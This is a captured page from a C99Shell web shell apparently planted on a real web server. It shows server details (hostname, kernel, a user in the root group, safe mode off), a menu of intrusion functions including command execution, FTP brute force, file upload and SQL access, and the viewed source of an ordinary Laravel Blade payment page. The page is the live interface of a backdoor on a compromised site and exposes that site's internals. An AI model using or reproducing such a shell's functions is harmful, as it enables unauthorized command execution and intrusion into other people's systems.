!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/resources/views/orders/   drwxr-xr-x
Free 28.91 GB of 117.98 GB (24.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     multypay.blade.php (2.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app', ['title' => ''])
@section('content')
<div class="container">
    <div class="row justify-content-center">
        <div class="card shadow border-0 mt-8">
            <div class="card-body text-center">
                <div class="justify-content-center text-center">
                    <lottie-player src="https://assets3.lottiefiles.com/packages/lf20_ltbqacam.json"  background="transparent"  speed="1"  style=" height: 200px;"  loop  autoplay></lottie-player>
                </div>
               
                <h3 class="display-2">{{ __("Let's pay") }}</h3>
                <h1 class="mb-4">
                    <?php 
                        $currency
=config('settings.cashier_currency');
                        
$convert=config('settings.do_convertion');
                    
?>
                    <span class="badge badge-primary">{{ __('Order')." #".$order->id_formated }}</span>
                    <span class="badge badge-primary">@money( $order->delivery_price+$order->order_price_with_discount, $currency,true)</span>  
                    
                </h1>
                <div class="d-flex justify-content-center">
                    <div class="col-8">
                        <br >
                        @foreach ($paymentMethods as $key => $name)
                        <a type="button"  href="{{ route("selectedpaymentt",["order"=>$order->id,'payment'=>$key])}}" role="button" class="btn btn-primary text-white">{{ __('Pay with')}} {{ __($name)}}</a><br ><br >
                            
                        @endforeach
                        <br ><br >
                        <div class="font-weight-300 mb-5">
                            {{ __("Thanks for your purchase") }}, 
                        <span class="h3">{{ $order->restorant->name }}</span></div>
                        @if (config('settings.wildcard_domain_ready'))
                            <a href="{{ $order->restorant->getLinkAttribute() }}" class="btn btn-outline-primary btn-sm">{{ __('Go back to restaurant') }}</a>
                        @else
                            <a href="{{ route('vendor',$order->restorant->subdomain) }}" class="btn btn-outline-primary btn-sm">{{ __('Go back to restaurant') }}</a>
                        @endif

                       
                            
                        
                        
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
@endsection






:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--